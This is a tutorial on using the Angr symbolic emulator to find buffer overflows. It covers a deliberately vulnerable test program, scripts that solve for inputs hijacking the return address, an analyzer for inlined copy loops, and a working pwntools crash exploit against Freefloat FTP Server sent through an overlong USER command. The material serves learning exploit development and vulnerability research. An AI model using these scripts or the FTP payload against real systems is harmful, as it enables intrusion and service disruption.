
Vicious exploitation. Searching for buffer overflow vulnerabilities with Angr

Angr, a powerful symbolic emulator, makes it possible to seize control over the execution of someone else’s code; all you have to do is specify the search direction. Today you will learn how to find buffer overflow holes in applications using Angr; in addition, you will write an analyzer for inlined functions and create a working exploit for a real-life FTP server.

info

More information about Angr can be found in my previous article: Anger management. Welcome to Angr, a symbolic emulation framework.

Unconstrained

Let’s write and build a test object: a small program deliberately vulnerable to buffer overflow. The build flags ensure a static ImageBase and the absence of a stack canary, which makes a hacker’s life much easier.

// gcc exp2.c -m32 -fno-stack-protector -no-pie -o exp2_32
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void win()
{
    printf("Win!\n");
}

void func(int key)
{
    char buf[32];
    printf("overflow me : ");
    gets(buf);
}

int main(int argc, char* argv[])
{
    func(1);
    return 0;
}

The code stores the input string in a local buffer. Your task is to overflow this buffer in a way that transfers the control flow to the win function.

08049196 int32_t win()
080491b3 e8b8feffff call puts
080491c1 char* func()
080491c1 55 push ebp {__saved_ebp}
080491c2 89e5 mov ebp, esp {__saved_ebp}
080491c4 53 push ebx {__saved_ebx}
080491c5 83ec24 sub esp, 0x24
080491e8 8d45d8 lea eax, [ebp-0x28 {buf}]
080491eb 50 push eax {buf} {var_3c}
080491ec e86ffeffff call gets
080491f8 c9 leave {__saved_ebp}
080491f9 c3 retn {__return_addr}
080491fa int32_t main(int32_t argc, char** argv, char** envp)
08049218 68efbeadde push 0x1
0804921d e89fffffff call func
08049222 83c410 add esp, 0x10

Let’s find out the actual addresses using a debugger. At the entry point of func(), the return address is on top of the stack. The prologue saves the old EBP and EBX on the stack and then subtracts 0x24 from ESP, thus creating a ‘pocket’ for local data on the stack.

0xffffd6a0: 00 00 00 00 # buf
# (...) local variables
0xffffd6c4: 00 80 f9 f7 # old EBX
0xffffd6c8: e8 d6 ff ff # old EBP
0xffffd6cc: 22 92 04 08 # ret addr -> 0x08049222
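The distance between buf and the return address follows directly from the listing and the dump above. Here is a minimal sketch of that arithmetic; the constant names are mine, and the filler byte is an arbitrary choice (any byte except a newline would do, since gets() stops at a newline).

```python
import struct

# Values read from the disassembly and the stack dump above.
BUF_OFFSET_FROM_EBP = 0x28      # lea eax, [ebp-0x28]
SAVED_EBP_SLOT = 0xFFFFD6C8     # where the old EBP is stored
RET_ADDR_SLOT = 0xFFFFD6CC      # where the return address is stored
WIN_ADDR = 0x08049196           # address of win()

buf_addr = SAVED_EBP_SLOT - BUF_OFFSET_FROM_EBP
padding = RET_ADDR_SLOT - buf_addr

# Filler up to the return address, then the new address in little-endian order.
payload = b"A" * padding + struct.pack("<I", WIN_ADDR)

print(hex(buf_addr), padding, payload[-4:])
```

The buffer starts at the address shown in the first line of the dump, and the filler has to cover the buffer itself, the saved EBX, and the saved EBP.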

The stack layout is quite conventional. Let’s try to overwrite the return address.

import angr
import claripy

project = angr.Project('exp2_32', auto_load_libs=False)

# 48 symbolic bytes are fed to the program through stdin
symbolic_input = claripy.BVS("input", 48 * 8)
initial_state = project.factory.entry_state(stdin=symbolic_input, args=['./a.out'])
initial_state.options.add('SYMBOL_FILL_UNCONSTRAINED_MEMORY')
initial_state.options.add('SYMBOL_FILL_UNCONSTRAINED_REGISTERS')

def is_fully_symbolic_pc(state):
    # True only if every single bit of the program counter is symbolic
    for i in range(state.arch.bits):
        if not state.solver.symbolic(state.regs.pc[i]):
            return False
    return True

simulation = project.factory.simgr(
    initial_state,
    save_unconstrained=True,
    stashes={
        'active' : [initial_state],
        'unconstrained' : [],
        'found' : [],
        'not_needed' : []
    }
)

def is_successful(state):
    # Stop exploring as soon as the unconstrained stash is not empty
    return simulation.unconstrained

simulation.explore(find=is_successful)
solution_state = simulation.unconstrained[0]

if is_fully_symbolic_pc(solution_state):
    # Force EIP to the address of win() and ask the solver for the input
    solution_state.add_constraints(solution_state.regs.eip == 0x8049196)
    solution = solution_state.solver.eval(symbolic_input, cast_to=bytes)
    print('input:', solution)

The script searches for input data that transfers control to address 0x8049196. How does it work? You start the simulation and wait until the unconstrained stash is filled. It contains states whose next instruction address has more than 256 possible values. In most cases, this means that the EIP register partially or completely depends on symbolic variables under your control. Just in case, you check whether every bit of the EIP register is symbolic. Then you add a constraint: the register must be equal to the address of win. After that, you ask the solver for a concrete input that satisfies all the constraints.

input: b’\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\x91\x04\x08′
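Why bother with the extra per-bit check if the state is already unconstrained? The toy model below is not Angr code; it only illustrates the counting. It assumes, for simplicity, that every symbolic bit of the program counter can be chosen independently, and the function names are hypothetical.

```python
# Toy model: a bit mask marks which bits of a 32-bit program counter
# are symbolic (attacker-controlled); all other bits are fixed.
UNCONSTRAINED_THRESHOLD = 256  # the threshold quoted in the text

def possible_targets(symbolic_mask: int) -> int:
    """Number of distinct addresses if each masked bit is chosen freely."""
    return 2 ** bin(symbolic_mask).count("1")

def looks_unconstrained(symbolic_mask: int) -> bool:
    """More than 256 candidate targets."""
    return possible_targets(symbolic_mask) > UNCONSTRAINED_THRESHOLD

def is_fully_symbolic(symbolic_mask: int, bits: int = 32) -> bool:
    """Every bit of the program counter is symbolic."""
    return symbolic_mask == (1 << bits) - 1

for mask in (0x000000FF, 0x0000FFFF, 0xFFFFFFFF):
    print(hex(mask), possible_targets(mask),
          looks_unconstrained(mask), is_fully_symbolic(mask))
```

In this model, a partial overwrite of the two low bytes already exceeds the threshold, yet it cannot reach an arbitrary address. Only a fully symbolic register guarantees that a constraint such as "EIP equals the address of win" has a chance of being satisfiable.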

First of all, let’s check whether everything works properly. Pwntools can be used for this purpose:

from pwn import *
p = process('./exp2_32')
buff = b'\x00' * 44 + b'\x96\x91\x04\x08'
p.sendline(buff)
print(p.recv())

Getting the much-anticipated result:

$ python test_exp2.py
[+] Starting local process './exp2_32': pid 9178
b'overflow me : Win!\n'
[*] Stopped process './exp2_32' (pid 9178)

Writing a VEX analyzer

Overflows frequently occur in functions like strcpy. If they are imported from external libraries, it’s not a big deal to find them and check their usage manually. However, optimizing compilers often replace them with inline versions.

If the compiler is popular and widespread, IDA Pro will find strcpy by FLIRT signatures. But if you change a few compiler flags or use an unfamiliar version, IDA becomes blind. Let’s write a universal solution applicable to any compiler, regardless of processor architecture and build flags.

The strcpy function is often implemented as memcpy with strlen performing preliminary string length calculation. But optimized versions (e.g. in Visual Studio) also exist:

@loop:
mov cl, byte [eax]
lea eax, [eax+0x1]
mov byte [edx+eax-0x1], cl
test cl, cl
jne @loop

As can be seen, the code performs three operations:

  • read a byte at a certain address;
  • write the received byte to another address; and 
  • return control to the beginning of the loop.

Each operation represents a primitive (i.e. an indivisible logical block that can be found in VEX code). First, let’s find a loop and then check whether it contains a read operation followed by a write operation applied to the bytes that were read.

import angr

path = 'bin/vs2017'
proj = angr.Project(path, auto_load_libs=False)
bin_cfg = proj.analyses.CFGFast(force_complete_scan=False)

def get_exits(block):
    # Addresses of all CFG successors of the block
    node = bin_cfg.get_any_node(block.addr)
    return [x.addr for x in node.successors]

def print_node(block):
    for x in block.vex.constant_jump_targets:
        print(hex(block.addr), hex(x))

def is_cycled_node(block):
    # A primitive loop: the block jumps back to its own beginning
    return block.addr in get_exits(block)

def is_load_byte(s):
    # A temporary receives one byte loaded from memory
    return (s.tag == 'Ist_WrTmp'
            and s.data.tag == 'Iex_Load'
            and s.data.type == 'Ity_I8')

def is_store_byte(s):
    # The value of a temporary is written to memory
    return s.tag == 'Ist_Store' and s.data.tag == 'Iex_RdTmp'

def is_memcpy_node(block):
    tmp_ids = []
    for s in block.vex.statements:
        if is_load_byte(s):
            tmp_ids.append(s.tmp)
            continue
        # The stored temporary must be one of those loaded earlier
        if is_store_byte(s) and s.data.tmp in tmp_ids:
            return True
    return False

print('Analyse:', path)
nodes_addr = [x.addr for x in bin_cfg.nodes_iter()]
for addr in nodes_addr:
    block = proj.factory.block(addr)
    if is_cycled_node(block):
        if is_memcpy_node(block):
            block.pp()

In Angr, a basic block is a straight-line piece of code that ends with an instruction transferring control. The algorithm is as follows: you analyze each block found by CFGFast; then you check whether the block has an exit that transfers the control flow to its own beginning (a primitive loop); after that, you analyze the VEX code by listing all statements inside the block; next, you find the read operation and remember the temporary variable where the data are placed; and finally, you find the write operation and check whether the same variable is used both in the read and write operations.
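To see the matching logic in isolation, here is a minimal sketch that runs without Angr. The Stmt and Expr classes are hand-written stand-ins that borrow only the tag and type names from VEX; they are not pyvex classes. The toy CFG and the load_types parameter are my own assumptions for illustration.

```python
from dataclasses import dataclass
from typing import Optional

# Hand-written stand-ins for VEX statements; these are NOT pyvex classes.
@dataclass
class Expr:
    tag: str                    # e.g. 'Iex_Load' or 'Iex_RdTmp'
    type: Optional[str] = None  # e.g. 'Ity_I8' for a one-byte load
    tmp: Optional[int] = None   # temporary read by an 'Iex_RdTmp'

@dataclass
class Stmt:
    tag: str                    # e.g. 'Ist_WrTmp' or 'Ist_Store'
    data: Optional[Expr] = None
    tmp: Optional[int] = None   # temporary written by an 'Ist_WrTmp'

def has_self_loop(addr, successors):
    """A primitive loop: the block is its own successor."""
    return addr in successors.get(addr, [])

def copies_loaded_value(statements, load_types=("Ity_I8",)):
    """True if a value loaded from memory is later stored to memory."""
    loaded = set()
    for s in statements:
        if (s.tag == "Ist_WrTmp" and s.data.tag == "Iex_Load"
                and s.data.type in load_types):
            loaded.add(s.tmp)
        elif (s.tag == "Ist_Store" and s.data.tag == "Iex_RdTmp"
                and s.data.tmp in loaded):
            return True
    return False

# Rough model of the byte-copy loop shown earlier.
loop_body = [
    Stmt("Ist_WrTmp", Expr("Iex_Load", type="Ity_I8"), tmp=1),  # cl = [eax]
    Stmt("Ist_Put"),                                            # register update
    Stmt("Ist_Store", Expr("Iex_RdTmp", tmp=1)),                # [edx+eax-1] = cl
]
toy_cfg = {0x1000: [0x1000, 0x1010]}  # illustrative addresses

print(has_self_loop(0x1000, toy_cfg), copies_loaded_value(loop_body))
```

Passing a different tuple of type names as load_types (for example, one containing Ity_I32) makes the same check match loops that copy wider values.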

Important: the script looks only for one-byte read operations because the data type is set to Ity_I8. By changing the size, you can catch other loop implementations. But for the sake of simplicity, let’s stop there. Time to apply the script to a file with memcpy compiled in Visual Studio.

Analyse: bin/vs2017

401160 mov cl, byte ptr [esp+eax+0x68]
401164 lea eax, [eax+0x1]
401167 mov byte ptr [esp+eax-0x1], cl
40116b test cl, cl
40116d jne 0x401160

Experiments with other files reveal additional variants.

402f6c rep movsb byte ptr es:[edi], byte ptr [esi]

4022a7 rep movsd dword ptr es:[edi], dword ptr [esi]

100093e4 mov al, byte ptr [edi+esi]
100093e7 mov byte ptr [esi], al
100093e9 inc esi
100093ea sub ecx, 0x1
100093ed jne 0x100093e4

100069c1 mov edx, dword ptr [esi]
100069c3 mov dword ptr [edi], edx
100069c5 lea esi, [esi+0x4]
100069c8 lea edi, [edi+0x4]
100069cb dec eax
100069cc jne 0x100069c1

100069b3 mov dl, byte ptr [esi]
100069b5 mov byte ptr [edi], dl
100069b7 inc esi
100069b8 inc edi
100069b9 dec ecx
100069ba jne 0x100069b3

1000c270 mov al, byte ptr [esi+edx]
1000c273 mov byte ptr [ebp+edx-0xc], al
1000c277 inc edx
1000c278 cmp edx, ecx
1000c27a jl 0x1000c270

1000687c sub edi, 0x4
1000687f sub esi, 0x4
10006882 mov eax, dword ptr [esi]
10006884 mov dword ptr [edi], eax
10006886 sub ecx, 0x4
10006889 test ecx, 0xfffffffc
1000688f jne 0x1000687c

10006851 sub esi, 0x20
10006854 sub edi, 0x20
10006857 movdqu xmm0, xmmword ptr [esi]
1000685b movdqu xmm1, xmmword ptr [esi+0x10]
10006860 movdqu xmmword ptr [edi], xmm0
10006864 movdqu xmmword ptr [edi+0x10], xmm1
10006869 sub ecx, 0x20
1000686c test ecx, 0xffffffe0
10006872 jne 0x10006851

In my humble opinion, the result is quite decent. You can find not only inline functions, but also makeshift memcpy functions that often contain implementation errors.

Attacking an application

I am going to use Freefloat FTP Server as a target; this is a classic example used by novice hackers to polish their buffer overflow skills. Admittedly, the easiest way to crash it is to write a protocol fuzzer. But I found it interesting and instructive to do this in a new way.

Debugging difficult cases

The first thing you can do is enable debug messages:

import logging
logging.getLogger('angr').setLevel('DEBUG')

In addition, some state flags (e.g. TRACK_MEMORY_ACTIONS) add debug messages to state.history.actions.

But I recommend debugging in PyCharm: it enables you to look inside Angr in the course of execution, which is really helpful.

You cannot start emulation from the very beginning of the program since it would take huge amounts of memory and time. First, you have to choose a starting point. The moment when the data are received (i.e. WS2_32.recv) seems to be the ideal choice.

When you go two calls deeper into the IDA pseudocode, you see the function that parses the input at 0x402190. This is a class method, and the structure with all its data is passed to it via ECX. I reconstructed it in IDA:

struct __fixed struct_ecx // sizeof=0x634
{
    __int32 SOCKET;
    __int32 PORT;
    __int32 CLIENT_PORT; // 0
    __int32 field_C; // 0
    __int32 field_10; // 0
    char *INPUT_ptr_1024; // XREF: build_input_str+8/r
                          // parse_input_str+11/r
    __int32 INPUT_end; // XREF: build_input_str+5/r
    char str_USERNAME_a[128] __strlit(C,"UTF-8");
    char str_PASSWORD_a[128] __strlit(C,"UTF-8");
    char str_answer_w[260] __strlit(C,"UTF-8");
    char not_used[260] __strlit(C,"UTF-8");
    char str_answer_2_w[520] __strlit(C,"UTF-8");
    char str_answer_a[260] __strlit(C,"UTF-8");
    __int32 IS_TYPE_I; // set to 1 in INIT
};

The code that fills out the initial structure can be found at the very beginning of the thread. Memory for the structure is allocated from the heap with the new operator; then a second buffer 1024 bytes in size is allocated there, and a pointer to it is placed inside the structure in INPUT_ptr_1024.
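As a sanity check on the reconstructed layout, the structure can be mirrored with the standard ctypes module. This is only a sketch: the class name StructEcx is mine, and the pointer field is modelled as a 32-bit integer on the assumption that the target is a 32-bit binary.

```python
import ctypes

class StructEcx(ctypes.Structure):
    # Mirror of the IDA structure; the pointer is stored as a 32-bit value
    # so that the layout does not depend on the machine running this script.
    _fields_ = [
        ("SOCKET", ctypes.c_int32),
        ("PORT", ctypes.c_int32),
        ("CLIENT_PORT", ctypes.c_int32),
        ("field_C", ctypes.c_int32),
        ("field_10", ctypes.c_int32),
        ("INPUT_ptr_1024", ctypes.c_uint32),
        ("INPUT_end", ctypes.c_int32),
        ("str_USERNAME_a", ctypes.c_char * 128),
        ("str_PASSWORD_a", ctypes.c_char * 128),
        ("str_answer_w", ctypes.c_char * 260),
        ("not_used", ctypes.c_char * 260),
        ("str_answer_2_w", ctypes.c_char * 520),
        ("str_answer_a", ctypes.c_char * 260),
        ("IS_TYPE_I", ctypes.c_int32),
    ]

print(hex(StructEcx.INPUT_ptr_1024.offset))  # offset of the input pointer
print(hex(ctypes.sizeof(StructEcx)))         # total size of the structure
```

The total size agrees with the sizeof comment in the IDA listing, and the offset of INPUT_ptr_1024 is the only part of the layout that the parser emulation really needs.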

Your objective is to simulate the creation of this structure using your own code:

import angr
path = 'bin/FTPServer.exe'
project = angr.Project(path, auto_load_libs=False)
EIP_START = 0x402190
initial_state = project.factory.blank_state(addr=EIP_START)
initial_state.options.add('ZERO_FILL_UNCONSTRAINED_MEMORY')
initial_state.options.add('ZERO_FILL_UNCONSTRAINED_REGISTERS')
FAKE_INPUT_ADDR = 0x38000
FAKE_STRUCT_ADDR = 0x39000
FAKE_STRUCT_SIZE = 0x10000
bvs_input = initial_state.solver.BVS("bvs_input", 8*1024)
initial_state.memory.store(FAKE_STRUCT_ADDR, b'\x00' * FAKE_STRUCT_SIZE, FAKE_STRUCT_SIZE)
initial_state.memory.store(FAKE_INPUT_ADDR, bvs_input)
angr.types.register_types(angr.types.parse_type('struct ftp_this { char unknown[0x14]; char * str_ptr; }'))
initial_state.mem[FAKE_STRUCT_ADDR].struct.ftp_this.str_ptr = FAKE_INPUT_ADDR
initial_state.regs.ecx = FAKE_STRUCT_ADDR

You create a new state at the entry of the parser. Then you ask Angr to fill uninitialized registers and memory areas with zeros. After that, you create a symbolic variable and substitute the input string with it. Angr supports interaction with structures; so, you can use them to write str_ptr.

step_count = 0

def next_step(sim_mngr):
    global step_count
    active = sim_mngr.stashes['active']
    print(f'\nstep_count: {step_count}, active: {len(active)}')
    step_count += 1

simulation = project.factory.simgr(initial_state)
simulation.explore(step_func=next_step)

If you run a test simulation, you’ll see that the number of active states quickly becomes greater than 300 (not to mention 8 gigabytes of RAM consumed by this process).

Avoiding path explosion

Let’s examine a possible implementation of strcpy:

while((*dst_ptr++ = *src_ptr++) != '\0');

Everything is simple when you are dealing with specific values, but if the string src_ptr is symbolic, then a fork occurs at each step of copying: exit the loop or go through another round.

Standard path searching will create two states for each iteration. In other words, to successfully ‘copy’ a symbolic string 128 bytes in size, 256 possible paths are required, and 255 of them lead to wrong places. And if the string is subsequently copied a few more times, then the number of possible paths increases to 256³!
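The counting can be reproduced with a few lines of plain Python. This is a deliberately rough model that follows the estimate above rather than Angr’s real bookkeeping; the function name is hypothetical.

```python
def fork_copy_loop(symbolic_bytes: int):
    """Model a byte-copy loop over a symbolic string.

    On every iteration the state that is still copying forks in two:
    one successor leaves the loop, the other goes for another round.
    Returns every successor created along the way.
    """
    created = []
    for i in range(symbolic_bytes):
        created.append(("exit", i))      # byte i is zero: leave the loop
        created.append(("continue", i))  # byte i is non-zero: next round
    return created

states = fork_copy_loop(128)
print(len(states))       # successors created by one copy
print(len(states) ** 3)  # the estimate for three consecutive copies
```

Only one of the successors from the last iteration corresponds to a complete copy of the string; all the others are states the emulator creates and then has to carry along.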

Therefore, if you use standard path searching, it would take forever to create a complete copy of a long string. Let’s write a selection algorithm that goes through cycles to a specified limit without transferring control before the due time.

class LoopHolder:
    def __init__(self, max_depth=15):
        # Maximum number of consecutive iterations of the same block
        self.max_depth = max_depth

    def _is_loop(self, state, item):
        # A successor that lands inside the current block is a loop edge
        block_size = state.block().size
        return (item.addr >= state.addr) and (item.addr < state.addr + block_size)

    def _get_loop_in_list(self, state, succ_list):
        for item in succ_list:
            if self._is_loop(state, item):
                return item
        return None

    def _count_prev_iter(self, state):
        # How many times in a row this address ends the block history
        count = 0
        for item in reversed(state.history.bbl_addrs):
            if item == state.addr:
                count += 1
            else:
                break
        return count

    def _process_loop(self, state, succ_list):
        next_loop = self._get_loop_in_list(state, succ_list)
        if not next_loop:
            return succ_list
        prev_count = self._count_prev_iter(next_loop)
        if prev_count >= self.max_depth:
            # Limit reached: keep only the exits from the loop
            succ_list.remove(next_loop)
            return succ_list
        # Limit not reached: keep only the next iteration
        return [next_loop]

    def _filter_succ(self, state, succ_list):
        if len(succ_list) == 1:
            return succ_list
        if len(succ_list) > 1:
            return self._process_loop(state, succ_list[:])
        return []

    def _remove_old_state(self, sim_succ, old_active):
        for item in old_active:
            sim_succ.successors.remove(item)
            sim_succ.flat_successors.remove(item)
            sim_succ.all_successors.remove(item)

    def _add_new_state(self, sim_succ, new_active):
        sim_succ.successors += new_active
        sim_succ.flat_successors += new_active
        sim_succ.all_successors += new_active

    def replace_succ(self, state, sim_succ):
        active = sim_succ.successors[:]
        if active:
            new_active = self._filter_succ(state, active)
            self._remove_old_state(sim_succ, active)
            self._add_new_state(sim_succ, new_active)
        return sim_succ

Angr makes it possible to replace almost any part of its built-in algorithms with your own; in this particular case, let’s replace the successors function. It takes a specific state and returns the successor states, i.e. the places where the control flow can be transferred next.

loop_filter = LoopHolder(300)
unconstrained_state = None

def successor_func(state, **run_args):
    global unconstrained_state
    old_succ = state.project.factory.successors(state, **run_args)
    if old_succ.unconstrained_successors:
        unconstrained_state = old_succ.unconstrained_successors[0]
    return loop_filter.replace_succ(state, old_succ)

simulation = project.factory.simgr(initial_state)
simulation.explore(successor_func=successor_func)

The algorithm detects the presence of a loop and counts the number of iterations: if their number has reached the maximum depth, it exits; if the number of iterations is less, it continues running the loop.
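The selection rule is easier to follow on plain addresses than on emulator states. The sketch below restates it without Angr: successors are just target addresses, the history is a list of executed block addresses, and both function names are hypothetical.

```python
def trailing_repeats(history, addr):
    """How many times in a row addr appears at the end of the history."""
    count = 0
    for visited in reversed(history):
        if visited != addr:
            break
        count += 1
    return count

def pick_successors(successors, loop_addr, history, max_depth):
    """Keep iterating a self-loop until max_depth, then allow only the exits."""
    if len(successors) < 2 or loop_addr not in successors:
        return successors                      # nothing to decide
    if trailing_repeats(history, loop_addr) >= max_depth:
        return [a for a in successors if a != loop_addr]
    return [loop_addr]

LOOP, EXIT = 0x20, 0x30
print(pick_successors([LOOP, EXIT], LOOP, [0x10, LOOP, LOOP], max_depth=3))
print(pick_successors([LOOP, EXIT], LOOP, [0x10, LOOP, LOOP, LOOP], max_depth=3))
```

With two iterations in the history, only the loop edge survives; once the limit of three is reached, only the exit survives. In both cases exactly one state goes on, which is what keeps the number of active states from growing.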

Also, successor_func remembers the unconstrained state as soon as it appears: since the successors are rewritten here, you won’t be able to find it anywhere else.

Configuring libc

If a function of the strlen type is taken from an external import, it will be replaced by a stub.

project.hook(0x403d70, angr.SIM_PROCEDURES['libc']['strncmp']())

In such a case, a different symbolic variable concretization strategy is used:

state.libc.buf_symbolic_bytes = 256
state.libc.max_str_len = 256

The exact size of the string is configured in the emulator state! I spent several days on debugging before making this discovery, and now I’m sharing it with you to save your time.

Reducing the number of states

simulation = project.factory.simgr(initial_state)
simulation.explore(successor_func=successor_func, find=0x402212)
state = simulation.found[0]
simulation2 = project.factory.simgr(state)
simulation2.explore(successor_func=successor_func)

The next step towards optimization is to limit the number of states to be examined. There are several branches inside the parser; each of them checks its own command: first QUIT, then USER, and so on. There is no point in going through all the commands simultaneously; instead, it’s better to perform a deep emulation of each command separately. First of all, let’s find the state at address 0x402212: it corresponds to the USER command branch.

Then you continue emulation without a specific goal. If everything goes according to plan, then at the end of the emulation (i.e. when all states reach the ret of the first function), you’ll find unconstrained_state:

EIP_GOAL = 0x44444444 # 'DDDD'

if unconstrained_state:
    state = unconstrained_state

if state and is_fully_symbolic_pc(state):
    state.add_constraints(state.regs.eip == EIP_GOAL)
    solution = state.solver.eval(bvs_input, cast_to=bytes)
    print('bvs_input:', solution.rstrip(b"\x00"))

The code displays the input string that will enable you to seize control over execution.

bvs_input: b'USER \x01\x01 (…) DDDD (…)'
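Turning the solver output into a network payload takes only a few lines. The sketch below uses a hypothetical solution value: the filler length is taken from the test script in the next section, and the trailing zero bytes stand in for whatever follows the marker in the real output.

```python
EIP_MARKER = b"DDDD"  # bytes that end up in EIP (0x44444444)

# Hypothetical solver output; the real one is elided in the listing above.
solution = b"USER " + b"\x01" * 230 + EIP_MARKER + b"\x00" * 16

# Split the command from its argument and locate the marker inside it.
command, _, argument = solution.rstrip(b"\x00").partition(b" ")
offset = argument.index(EIP_MARKER)

# Everything after the marker is not needed to overwrite the return address.
exploit = command + b" " + argument[:offset] + EIP_MARKER + b"\r\n"

print(command, offset, len(exploit))
```

The offset of the marker within the argument is the number of filler bytes that must precede the new return address.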

Testing the exploit

Running the script:

from pwn import *
exploit = b'USER ' + b'\x01' * 230 + b'DDDD' + b'\r\n'
conn = remote('127.0.0.1', 21)
conn.recvline()
conn.send(exploit)
conn.recvuntil(b' ', drop=True)
conn.recvline()
conn.close()

It connects to the FTP server and crashes it. Congrats!
